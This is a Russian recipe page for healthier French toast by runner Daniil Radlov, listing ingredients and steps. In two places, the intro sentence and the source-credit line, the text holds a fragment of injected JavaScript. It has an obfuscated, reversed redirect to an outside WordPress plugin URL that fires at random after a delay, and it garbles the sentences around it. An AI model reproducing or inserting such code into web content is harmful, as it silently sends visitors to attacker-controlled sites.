Гренки на завтрак: рецепт от Даниила Радлова

Каждое воскресенье друзья fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru делятся с нами своими самыми любимыми рецептами. На этот раз один из Go Bro, капитан adidas Runners, Даниил Радлов, вспоминает мамины гренки и рассказывает, как сделать этот завтрак не только вкусным, но и очень полезным.

Гренки на завтрак: рецепт от Даниила Радлова. Изображение номер 1

Даниил Радлов

 

Даниил Радлов

один из основателей проекта GoBro, капитан бегового клуба adidas runners Moscow

— Моим самым любимым завтраком в детстве были гренки (или французские тосты), которые готовила нам мама. Их аромат и вкус заставляли меня даже в выходной день вставать пораньше и делать это с улыбкой на лице, предвкушая любимый завтрак. Состав очень простой и совсем не диетический: хлеб, молоко, куриные яйца, сахар, немного соли и ещё сахар — побольше, сверху!

 

Было бы ошибкой, начав увлекаться бегом и здоровым образом жизни, отказаться от любимых гренок, поэтому я немного изменил рецепт: сделал его менее тяжёлым для организма и более белковым и обогащённым омега жирными кислотами — в чём мне помогли любимые льняные семечки.

Гренки на завтрак

Гренки на завтрак: рецепт от Даниила Радлова. Изображение номер 2

Фото: Даниил Радлов

Гренки на завтрак: рецепт от Даниила Радлова

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

10 МИНУТ

КОЛИЧЕСТВО ПОРЦИЙ:

1-2 порции

КАЛОРИЙНОСТЬ:

250—300 ккал

250 calories

Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru

PT1H

PT1H

Ингредиенты

Цельнозерновой хлеб

4 ломтика

Яйца

2 шт.

Фундучное / миндальное / овсяное молоко

100 мл

Фундук

80 г

Протеин (в порошке)

1 мерная ложка

Льняные семечки

1,5 ст. л.

Корица

2 ч. л.

  1. Измельчите фундук, перемешайте с льняными семечками и выложите на тарелку.
  2. Смешайте в миске одно яйцо, один белок, молоко, протеин и корицу.
  3. Окуните ломтики цельнозернового хлеба в жидкую смесь, хорошо пропитайте и обваляйте в смеси ореха и льняных семечек.
  4. Поджарьте хлеб на среднем огне до готовности. Сверху можно посыпать гренки сезонными ягодами и полить сиропом агавы.

Титульное фото: Пётр Тучинский

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector